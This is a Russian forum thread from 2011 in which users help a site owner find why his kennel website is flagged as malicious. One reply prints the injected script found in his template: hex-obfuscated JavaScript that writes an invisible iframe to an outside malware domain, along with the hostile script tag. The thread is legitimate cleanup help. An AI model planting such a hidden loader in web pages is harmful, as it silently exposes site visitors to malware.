Перейти к содержимому

Сервис обмена электронных валют

Партнерская программа Kredov

  • Закрытая тема Тема закрыта

Помогити плизз! На сайте ТРОЯН!

#11 TiP-A-ToP

TiP-A-ToP
    Topic Starter
  • Пользователь
  • 119 сообщений
  • Репутация: 0
0

Отправлено 09 Январь 2011 - 12:42

а какой примерно код должен быть?
  • 0

#12 Banderas

Banderas
  • Пользователь
  • 1 168 сообщений
  • Репутация: 1

Отправлено 09 Январь 2011 - 16:33

а какой примерно код должен быть?

скопируйте html код главной страницы, тот что между тегами <head></head> и вставьте сюда (на нашем форуме для этого есть специальные bbcode теги).

Пытался сам зайти на сайт, но меня раз 6-7 отговаривал Хром, но потом меня выбросило на порно партнерку. Больше не рисковал...
  • 0


#13 TiP-A-ToP

TiP-A-ToP
    Topic Starter
  • Пользователь
  • 119 сообщений
  • Репутация: 0

Отправлено 09 Январь 2011 - 17:15

 <meta name='yandex-verification' content='6e7380f66e54d212' /> 
<link rel="icon" href="www.google.com/ig/c/favicons?domain=wwe.su" type="image/x-icon">
<link rel="shortcut icon" href="www.google.com/ig/c/favicons?domain=wwe.su" type="image/x-icon">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="google-site-verification" content="qALhB2u17m3SbAuo7UdE4lrQVGkkGcyEgdRZEqc4MQs" />
<style type="text/css"> body { cursor: url('http://astoria-kas.at.ua/ovchark3.cur'); } </style>
<title>Питомник Astoria Kas - Главная страница</title>

<link type="text/css" rel="StyleSheet" href="/.s/src/css/841.css" />
<link type="text/css" rel="StyleSheet" href="http://s44.ucoz.net/src/layer6.css" /><script type="text/javascript" src="http://s44.ucoz.net/src/u.js"></script><style type="text/css">.UhideBlockL {display:none}</style>

  • 0

#14 surfer

surfer
  • Заблокированные
  • 1 956 сообщений
  • Репутация: 71

Отправлено 09 Январь 2011 - 17:31

отруби все партнерки, посмотри на результат, потом по очереди подключи и найдешь
  • 0

#15 TiP-A-ToP

TiP-A-ToP
    Topic Starter
  • Пользователь
  • 119 сообщений
  • Репутация: 0

Отправлено 09 Январь 2011 - 17:34

убрал, но как проверить сработало ли оно?
  • 0

#16 surfer

surfer
  • Заблокированные
  • 1 956 сообщений
  • Репутация: 71

Отправлено 09 Январь 2011 - 17:52

у меня все равно FF ругается:

Безопасный просмотр
Страница диагностики для astoria-kas.com

Занесен ли сайт astoria-kas.com в список подозрительных веб-сайтов?

Сайт занесен в список подозрительных веб-сайтов – посещение этого сайта может нанести вред вашему компьютеру.

В некоторой части этого сайта несколько раз (1) за последние 90 дней была замечена подозрительная активность.

Что произошло во время последнего просмотра этого сайта компанией Google?

Из протестированных нами за последние 90 дней страниц данного сайта (2) в загрузке и установке вредоносного программного обеспечения без разрешения пользователя было замечено 1. Последний раз сайт просматривался Google 2011-01-09, а подозрительное содержание было обнаружено 2011-01-09.

Malicious software includes 1 scripting exploit(s).

Количество доменов, на которых размещается вредоносное ПО, равняется 3, включая pro-zp.narod.ru/, razor.ipq.co/, tnafix.ru/.

Несколько доменов (5), по всей видимости, является промежуточными звеньями в распространении вредоносного ПО среди посетителей этого сайта, включая wifikflc.info/, pro-zp.narod.ru/, assassin-vse.narod.ru/.

This site was hosted on 1 network(s) including AS41947 (WEBALTA).

Был ли данный сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?

По всей видимости, за последние 90 дней сайт astoria-kas.com не был промежуточным звеном в заражении других сайтов.

Размещается ли на этом сайте вредоносное программное обеспечение?

Нет. За последние 90 дней на этом сайте не размещалось вредоносное программное обеспечение.

Как это произошло?

В некоторых случаях третьи лица могут добавить вредоносный код на вполне законные сайты. Предупреждающее сообщение может быть показано нами именно по этой причине.

Следующие действия:

* Вернуться на предыдущую страницу.


http://safebrowsing....p;site=AS:41947


слушай я не знаю, что за хостинг у тебя, но по идее у нормального хоста должен быть антивирус, прогони им

а какой браузер используешь?
  • 0

#17 TiP-A-ToP

TiP-A-ToP
    Topic Starter
  • Пользователь
  • 119 сообщений
  • Репутация: 0

Отправлено 09 Январь 2011 - 18:18

Хостинг Украина ukraine.com.ua
антивируску не нашёл=(
домен покупаю первый раз=) опыта не имею

опера11
  • 0

#18 surfer

surfer
  • Заблокированные
  • 1 956 сообщений
  • Репутация: 71

Отправлено 09 Январь 2011 - 18:32

поставь http://www.mozilla.com/ru/firefox/
в опере не блокируется, но активность есть

напиши хостеру, спроси про антивирус и спроси про проблему

там есть cpanel?
  • 0

#19 TiP-A-ToP

TiP-A-ToP
    Topic Starter
  • Пользователь
  • 119 сообщений
  • Репутация: 0

Отправлено 09 Январь 2011 - 18:35

что, и где cpanel
  • 0

#20 surfer

surfer
  • Заблокированные
  • 1 956 сообщений
  • Репутация: 71

Отправлено 09 Январь 2011 - 18:45

у тебя внедрен следующий код

<script type="text/javascript" src="http://pro-zp.narod.ru/base.js"></script>


я думаю он является источником бед, попробуй убить его и посмотри, т.к. такой сайт pro-zp.narod.ru не создан, а сам скрипт так же блокируется
думаю это троян, вот его содержимое:

var _0xd1d5=["\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x61\x73\x73\x61\x73\x73\x69\x6E\x2D\x76\x73\x65\x2E\x6E\x61\x72\x6F\x64\x2E\x72\x75\x2F\x27\x20\x77\x69\x64\x74\x68\x3D\x27\x30\x25\x27\x20\x68\x65\x69\x67\x68\x74\x3D\x27\x30\x25\x27\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x27\x6E\x6F\x27\x20\x66\x72\x61\x6D\x65\x42\x6F\x72\x64\x65\x72\x3D\x30\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x77\x72\x69\x74\x65"];document[_0xd1d5[1]](_0xd1d5[0]);

а вот ссылка где о нем говорят http://forum.xakep.r...3/printable.htm

он находиться тут:
<!-- <block4> -->
<table border="0" cellpadding="0" cellspacing="0" bgcolor="#033FF" " width="191">
<tr><td height="40" style="background:url('http://astoria-kas.at.ua/q1q1.gif') #336699;color:#b22222;padding-right:10px;" align="right"><b><!-- <bt> -->Пользователь<!-- </bt> --></b></td></tr>
<tr><td top no-repeat;"><!-- <bc> -->
<br>
<div align="center"<img src="/.s/t/982/7.gif"
<br>Гость, мы рады вас видеть. Пожалуйста зарегистрируйтесь или авторизуйтесь!
</div><script type="text/javascript" src="http://pro-zp.narod.ru/base.js"></script>

</div><!-- </bc> --></td></tr>
<tr><td><img src="http://astoria-kas.at.ua/x.png" border="0"></td></tr>
</table><br />
<!-- </block4> -->


и на будущее обычно их подгружают не между тегами head как некоторые советуют, наверное от не знания, а между тегами body!!!
  • 0

robot

robot
  • Пользователь PRO
  • 2 652 сообщений
  • Репутация: 85


Оформление форума – IPBSkins.ru